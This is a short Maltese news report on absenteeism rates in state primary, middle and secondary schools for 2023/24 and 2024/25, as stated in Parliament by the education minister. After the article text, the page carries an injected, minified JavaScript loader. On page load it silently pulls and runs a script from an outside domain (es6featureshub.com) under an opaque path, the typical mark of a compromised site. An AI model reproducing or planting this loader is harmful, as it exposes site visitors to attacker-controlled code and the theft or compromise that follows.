Lokali Parlament

Rata ta’ assenteiżmu fl-iskejjel sekondarji ta’ 8.26%

L-akbar rata ta’ assenteiżmu fl-iskejjel primarji u sekondarji tal-Gvern hi fl-iskejjel skondarji  u fis-sena skolastika li għaddiet, 2024-2025, kienet  ta’ 8.26 mija meta mqabbel mr-rata ta’ 8.46 fil-mija s-sena skolastika ta’ qabel.

Fis-sena skolastika li għaddiet ir-rata ta’ assenteiżmu fil-primarja kienet ta’ 3.56%; u fl-iskejjel medji kienet ta’ 5 fil-mija waqt li fis-sena skolastika 2023/24 ir-rata ta’ assenteiżmu fil-primarja kienet ta’ 4.01%; u fl-iskejjel medji kienet 5.58 fil-mija.

Dettalji dwar ir-rata ta’ assenteiżmu fl-iskejjel tal-Istat tkellem fil-Parlament Cjifton Grima, il-Ministru għall-Edukazzjoni, l-Isport, iż-Żgħażagħ, ir-Riċerka u l-Innovazzjoni; meta kien qed iwieġeb interpellanza tad-Deputat Nazzjonalista Ivan Bartolo.

;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);